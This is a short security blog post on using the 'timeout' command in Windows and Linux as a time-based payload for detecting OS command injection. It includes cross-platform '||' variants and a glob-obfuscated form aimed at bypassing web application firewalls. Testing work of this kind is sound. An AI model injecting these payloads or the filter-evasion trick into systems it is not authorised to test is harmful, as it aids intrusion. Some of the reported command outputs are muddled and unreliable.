evren@b0x:~$_ cd ..
~/posts/diversify-attack-vectors-via-time-management.md

Diversify Attack Vectors via Time Management

Introduction

I've recently learned about the "Timeout" function while working with cmd.exe and wanted to share this quick post.

The Timeout function can delay any system function for X seconds with the /T X command, found via the Timeout help pages (Timeout /?) on Windows. On Linux, it does something similar with timeout Xs.

We could delay the system via the Timeout function — which raised the idea of creating an alternative to attack vectors such as ping or sleep this way. It seems possible in different ways: running the command might produce syntax errors, but some of it will work. Let's use this to develop attack vectors.

Windows Examples

Timeout /T 1
> waiting for 1 sec
Timeout 1
> waiting for 1 sec

Linux Examples

timeout 1
> Try 'timeout --help' for more information.
timeout 1s sleep 5
> waiting for 1 sec. The "sleep" command is not working.
timeout 1 sleep 5
> waiting for 1 sec. The "sleep" command is not working.
timeout 3 ping -n 127.0.0.1
> The ping command worked 3 times.
timeout 0 ping -n 3 127.0.0.1
> connect: Invalid argument

Cross-Platform Attack Vectors

For both Linux and Windows, some payloads were created above. Now let's try to create an attack vector that works on both operating systems, by dividing the command in two using the || double-pipe operator.

Windows Examples

timeout 5 || timeout 1 sleep 5
> The command worked on the left of the double pipe.
timeout /T 5 || timeout 1 sleep 5
> The command worked on the left of the double pipe.

Linux Examples

timeout 5 || timeout 1 sleep 5
> The command didn't work on the left ("Try 'timeout --help'...") but waited 1 second on the right.
timeout 5 || timeout 0 sleep 5
> The command didn't work on the left, but waited 5 seconds on the right using the sleep command.

WAF Bypass Techniques

Some examples above worked in both operating systems, which led to filing an issue in the Commix repository for these attack vectors (Commix - GitHub Issues). The Timeout function could potentially be used for WAF bypass detection in an OOB (Out-of-Band) payload — time-based detection during the vulnerability detection phase.

For example, the following variant can be used for WAF bypass while testing OS Command Injection — the ? symbol also triggers Bash's glob-guessing mechanism:

timeout 3 /b??/p??g -n 127.0.0.1

Have fun! Special thanks to Zinnur Yeşilyurt.

this post is shared for educational and research purposes, contributing to the larger goal of enhancing internet security.